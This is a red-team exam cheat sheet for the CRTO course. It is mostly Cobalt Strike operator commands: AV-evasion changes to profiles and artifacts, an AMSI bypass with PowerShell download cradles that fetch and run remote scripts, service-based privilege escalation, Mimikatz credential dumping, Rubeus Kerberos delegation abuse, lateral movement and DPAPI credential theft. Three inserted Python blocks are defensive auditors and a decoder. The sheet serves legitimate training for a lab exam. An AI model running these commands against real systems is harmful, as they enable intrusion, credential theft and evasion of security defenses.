This is a cheat sheet for the CRTO exam. It covers the changes made to the C2 before the exam starts, plus the commands most likely to be needed.
Before you start
c2 profile
Edit the profile at cobaltstrike/c2-profiles/normal/webbug.profile
to remove indicators, enable evasion options, and so on.
set tasks_max_size "2097152";
post-ex {
    set amsi_disable "true";
    set obfuscate "true";
    set smartinject "true";
    set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
    set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
}
stage {
    set userwx "false";
    set cleanup "true";
    set obfuscate "true";
    set sleep_mask "false";
    set module_x64 "xpsservices.dll";
    transform-x86 {
        prepend "\x90\x90\x90";
        append "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
    }
    transform-x64 {
        prepend "\x90\x90\x90";
        append "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
    }
    data "bigb0ss";
    stringw "0062 0069 0067 0062 0030 0073 0073";
}
Then check that the profile is well-formed:
./c2lint c2-profiles/normal/webbug.profile
artifact
Edit the files under
C:\Tools\cobaltstrike\arsenal-kit\kits\artifact
# bypass-pipe.c
# line 130
sprintf(pipename, "%c%c%c%c%c%c%c%c%cmimi\\nana", 92, 92, 46, 92, 112, 105, 112, 101, 92);
# Patch.c
# line 115
for (int x = 0; x < length; x++) {
    char* a = (char *)ptr + x;
    char* b = (char *)buffer + x;
    // random
    GetTickCount();
    *a = *b ^ key[x % 8];
}
In WSL, go to /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact/
and rebuild the injector. These settings were worked out in advance; if the artifact is still flagged, use Ghidra to locate and fix the problem.
./build.sh pipe VirtualAlloc 310272 5 false false none /mnt/c/Tools/cobaltstrike/artifacts
# Check whether it evades detection (turn Defender off first)
C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Debug\threatcheck.exe -f "c:\tools\cobaltstrike\artifacts\pipe\artifact64big.exe"
# Load the script at c:/tools/cobaltstrike/artifacts/pipe/artifact.cna in CS
resource kit
Wraps the PowerShell scripts for evasion.
cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource
# Edit template.x64.ps1
# line 26
for ($mimi = 0; $mimi -lt $v_code.Count; $mimi++) {
    $v_code[$mimi] = $v_code[$mimi] -bxor 35
}
# Build
./build.sh /mnt/c/Tools/cobaltstrike/resource
# Turn Defender on
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.ps1 -e amsi
Once it evades detection, load the script in CS.
Hardware breakpoints
AMSI bypass script:
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
Save this file and host it. Request it before running any PowerShell script.
iex (new-object net.webclient).downloadstring("http://10.10.5.50/bypass"); iex (new-object net.webclient).downloadstring("http://10.10.5.50/a")
Get-MpThreatDetection | Sort-Object InitialDetectionTime
spawnto changes
When moving laterally, change the spawnto target.
ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe
Privilege escalation
CRTO-specific: only the methods from the course material are recorded here.
# Unquoted service path
execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
cd C:\Program Files\Vulnerable Services
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exe
run sc stop VulnService1
run sc start VulnService1
run netstat -anp tcp
connect localhost 4444
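Defender-side note, added here and not part of the original cheat sheet: the unquoted-path check that SharpUp performs above can be reproduced in a few lines that take a service ImagePath, list the paths Windows would probe in order, and emit the quoted ImagePath that fixes it. Service names and ImagePath values in the sample are constructed; nothing is read from a live host.

```python
import re

# Constructed sample ImagePath values (not taken from any real host).
SAMPLE_SERVICES = {
    "VulnService1": r"C:\Program Files\Vulnerable Services\Service 1.exe",
    "QuotedService": r'"C:\Program Files\Vulnerable Services\Service 1.exe"',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "WithArgs": r"C:\Program Files\My App\bin\svc.exe -k netsvcs",
}


def service_binary(image_path):
    """Return (binary, quoted): the executable part of an ImagePath and whether it was quoted."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end > 0 else p[1:]), True
    # Unquoted: the binary runs up to the first ".exe" that ends a token; the rest is arguments.
    m = re.match(r"(.*?\.exe)(?=\s|$)", p, re.IGNORECASE)
    return (m.group(1) if m else p), False


def probe_order(binary):
    """Paths CreateProcess tries, in order, for an unquoted binary path containing spaces."""
    parts = binary.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(binary)
    return candidates


def fixed_image_path(image_path, binary):
    """Quote the executable part and keep any trailing arguments unchanged."""
    args = image_path.strip()[len(binary):]
    return f'"{binary}"{args}'


def audit_service(name, image_path):
    """Flag an ImagePath that is unquoted and contains spaces, and show the remediation."""
    binary, quoted = service_binary(image_path)
    vulnerable = (not quoted) and (" " in binary)
    return {
        "service": name,
        "binary": binary,
        "vulnerable": vulnerable,
        "probe_order": probe_order(binary) if vulnerable else [binary],
        "fixed_image_path": fixed_image_path(image_path, binary) if vulnerable else image_path,
    }


def audit_all(services):
    return [audit_service(n, p) for n, p in services.items()]


if __name__ == "__main__":
    for r in audit_all(SAMPLE_SERVICES):
        status = "UNQUOTED" if r["vulnerable"] else "ok"
        print(f"{r['service']:14} {status:9} {r['binary']}")
        if r["vulnerable"]:
            for c in r["probe_order"][:-1]:
                print(f"    would probe: {c}")
            print(f"    fix: set ImagePath to {r['fixed_image_path']}")
```

The remediation is the quoted path only; the probe list explains why a writable directory anywhere along it matters, which is what the audit output should make obvious to whoever fixes the service.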
# Modifiable service configuration
execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
powershell-import C:\Tools\Get-ServiceAcl.ps1
powershell Get-ServiceAcl -Name VulnService2 | select -expand Access
mkdir C:\Temp
cd C:\Temp
upload C:\Payloads\tcp-local_x64.svc.exe
run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
run sc stop VulnService2
run sc start VulnService2
connect localhost 4444
# Modifiable service binary
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
download Service 3.exe
copy "tcp-local_x64.svc.exe" "Service 3.exe"
run sc stop VulnService3
upload C:\Payloads\Service 3.exe
run sc start VulnService3
connect localhost 4444
elevate uac-schtasks tcp-local
Mimikatz
mimikatz !lsadump::sam
mimikatz !sekurlsa::logonpasswords
mimikatz !sekurlsa::ekeys
dcsync acme.corp DEV\krbtgt
Impersonation
pth DEV\jking 59fc0f884922b4ce376051134c71e22c
mimikatz sekurlsa::pth /user:"lmonk" /domain:"ACME" /ntlm:0c714e4e1a97b15351e90d1aaa3ac3f8 /run:notepad.exe
acme.corp\lmonk 0c714e4e1a97b15351e90d1aaa3ac3f8
ps
steal_token [PID]
ps
inject [PID] x64 tcp-local
make_token jking Qwer123
Ticket attacks
Unconstrained delegation
# Find computers in the domain configured for unconstrained delegation
execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# After compromising one, go to "Using a TGT"
Constrained delegation
After obtaining an account configured for constrained delegation, access any service on the machines it is allowed to delegate to.
# Query computers with constrained delegation
execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Query users with constrained delegation
execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# After compromising one, go to "Using a TGT"
# /altservice lets the ticket be requested for any service; adding /altservice:ldap yields a TGS that can perform a DC sync. Request the TGS like this:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFuj[...snip...]lDLklP /nowrap
# Once you have the TGS, create a new process with it
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFuj[...snip...]lDLklP
Resource-based constrained delegation
Modify the victim computer's access control so that it includes us, then access it at will.
# Query all computers and their ACLs
powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# Convert the SID to a name: it is DEV\developers
powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# Check who is in it: bfarmer
powershell Get-DomainGroupMember -Identity "DEV\Developers"
# The SPN principal can be a computer account, e.g. a computer we have already elevated on
powershell Get-DomainComputer -Identity wkstn-2 -Properties objectSid
# S-1-5-21-569305411-121244042-2357301523-1109
# Using PowerView, write the delegation right onto the target computer (dc-2) so that the attacker-controlled account can act on behalf of other users to it.
powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
powershell Get-DomainComputer -Identity "dc-2" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
# Do S4U impersonation with Rubeus using the WKSTN-2$ account
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump the ticket
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# Repeat the earlier flow to get the TGS
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:WKSTN-2$ /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /ticket:doIFuj[...snip...]lDLklP /nowrap
# Spawn a new process
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFuj[...snip...]lDLklP
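Added audit example, not from the original notes: one script covering the three delegation checks above from the defender's side: the userAccountControl bit (524288) tested by the unconstrained query, msDS-AllowedToDelegateTo with protocol transition, and the RBCD descriptor written to dc-2. The directory records are constructed; the script assumes msDS-AllowedToActOnBehalfOfOtherIdentity has already been rendered as SDDL (the same form the RawSecurityDescriptor line above starts from; in the directory it is a binary descriptor), and the SID-to-name map is a constructed stand-in for a lookup.

```python
import re

# userAccountControl bits that matter for delegation (values from the Microsoft documentation).
UAC_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller account
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # 524288, the bit the unconstrained query above tests
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed directory records, shaped like the attributes the ADSearch/PowerView queries above return.
# The RBCD value is assumed to be already rendered as SDDL; in the directory it is a binary descriptor.
SAMPLE_OBJECTS = [
    {"samaccountname": "DC-2$", "userAccountControl": 0x2000 | 0x80000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity":
         "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"},
    {"samaccountname": "WEB$", "userAccountControl": 0x1000 | 0x80000},
    {"samaccountname": "SQL-2$", "userAccountControl": 0x1000 | 0x1000000,
     "msds-allowedtodelegateto": ["cifs/dc-2.dev.cyberbotic.io"]},
    {"samaccountname": "WKSTN-2$", "userAccountControl": 0x1000},
]

# Constructed SID-to-name map (the -1109 RID is the wkstn-2 objectSid shown above).
SID_NAMES = {"S-1-5-21-569305411-121244042-2357301523-1109": "DEV\\WKSTN-2$"}

# One SDDL ACE: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^)]*)\)")


def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts (type, flags, rights, trustee)."""
    m = re.search(r"D:[A-Z]*((?:\([^()]*\))*)", sddl)
    if not m:
        return []
    return [
        {"type": a.group(1), "flags": a.group(2), "rights": a.group(3), "trustee": a.group(6)}
        for a in ACE_RE.finditer(m.group(1))
    ]


def audit_delegation(objects):
    """Return one finding per delegation configuration that lets a principal impersonate users."""
    findings = []
    for o in objects:
        name = o["samaccountname"]
        uac = o.get("userAccountControl", 0)
        # DCs carry TRUSTED_FOR_DELEGATION by design; only member machines are unexpected.
        if (uac & UAC_TRUSTED_FOR_DELEGATION) and not (uac & UAC_SERVER_TRUST_ACCOUNT):
            findings.append({"object": name, "kind": "unconstrained", "target": "*"})
        for spn in o.get("msds-allowedtodelegateto", []):
            kind = "constrained"
            if uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION:
                kind += "+protocol-transition"  # S4U2self allowed: no user interaction needed
            findings.append({"object": name, "kind": kind, "target": spn})
        sd = o.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
        for ace in (parse_dacl(sd) if sd else []):
            if ace["type"] == "A":  # access-allowed ACE: this trustee may act on behalf of users to `name`
                trustee = SID_NAMES.get(ace["trustee"], ace["trustee"])
                findings.append({"object": name, "kind": "rbcd", "target": trustee})
    return findings


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_OBJECTS):
        print(f"{f['object']:10} {f['kind']:32} {f['target']}")
```

Run periodically, the RBCD branch is the one that catches the Set-DomainObject write shown above: a new access-allowed ACE on msDS-AllowedToActOnBehalfOfOtherIdentity of a DC, naming a workstation account, is not something a legitimate change produces.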
NTLM to TGT
# With the hash obtained from mimikatz
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
# With the Kerberos AES256 key
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
Using a TGT
User accounts
# List
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x5985a /service:krbtgt /nowrap
# Create an empty sacrificial session
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
# Import
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
# Steal the token
steal_token 13840
Machine accounts
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIGa[...snip...]uaW8= /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGa[...snip...]uaW8=
steal_token 18832
Lateral movement
# winrm
jump winrm64 web.dev.cyberbotic.io smb
jump winrm web.dev.cyberbotic.io smb
jump psexec64 web.dev.cyberbotic.io smb
upload C:\Payloads\smb_x64.exe
remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
Internal attacks
DPAPI
# DPAPI
# The API Windows uses to protect stored credentials
run vaultcmd /list
run vaultcmd /listcreds:"Windows Credentials" /all
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
mimikatz !sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
Scheduled tasks
# The user's credentials may be cached here
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E
mimikatz !sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9
Certificates
Other
base64 encoding
# Windows
$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux (assign the variable; "set str ..." would only set the shell's positional parameters)
str='IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
echo -n "$str" | iconv -t UTF-16LE | base64 -w 0
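Added example, not from the original page: the reverse of the encoding above, as a defender would use it when a process-creation log shows powershell.exe -enc ...: it pulls the base64 argument out of a command line, decodes it as UTF-16LE (falling back to UTF-8 when the blob was built the wrong way), and flags download-cradle strings. The command line is constructed from the page's own string; the indicator list is a constructed starting point, not a complete ruleset.

```python
import base64
import re

# Constructed sample, encoded exactly as the snippet above does it (UTF-16LE, then base64).
SAMPLE_PLAIN = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'


def encode_command(plain):
    """PowerShell -EncodedCommand form: UTF-16LE bytes, then base64 (same as the Windows/Linux lines above)."""
    return base64.b64encode(plain.encode("utf-16-le")).decode("ascii")


SAMPLE_ENCODED = encode_command(SAMPLE_PLAIN)
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"
# A blob built from plain UTF-8 instead of UTF-16LE (a common mistake; PowerShell itself would not run it).
SAMPLE_UTF8_ENCODED = base64.b64encode(b"Write-Host hi").decode("ascii")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...). Longest first.
_PREFIXES = sorted(("encodedcommand"[:i] for i in range(1, 15)), key=len, reverse=True)
ENC_RE = re.compile(r"(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Strings worth flagging in a decoded command (download cradle / inline execution); constructed list.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def decode_encoded_command(b64):
    """Decode a -EncodedCommand blob; returns (text, encoding_used)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    # Correctly built blobs are UTF-16LE; for ASCII text every high byte is zero.
    if len(raw) % 2 == 0 and raw[1::2].count(0) >= 0.9 * (len(raw) // 2):
        return raw.decode("utf-16-le"), "utf-16-le"
    try:
        return raw.decode("utf-8"), "utf-8"
    except UnicodeDecodeError:
        return raw.decode("latin-1"), "latin-1"


def triage_cmdline(cmdline):
    """Find an encoded command in a process command line, decode it and list indicator hits."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    text, enc = decode_encoded_command(m.group(1))
    lowered = text.lower()
    return {"decoded": text, "encoding": enc,
            "indicators": [i for i in INDICATORS if i in lowered]}


if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE,
                "powershell -EncodedCommand " + SAMPLE_UTF8_ENCODED,
                "powershell -ep bypass -File C:\\x.ps1"):
        print(triage_cmdline(cmd))
```

The UTF-16LE check looks at the high bytes rather than trying the decode first, because an even-length UTF-8 blob decodes as UTF-16LE without error and simply yields CJK garbage; that is the failure mode the Linux one-liner above avoids by going through iconv.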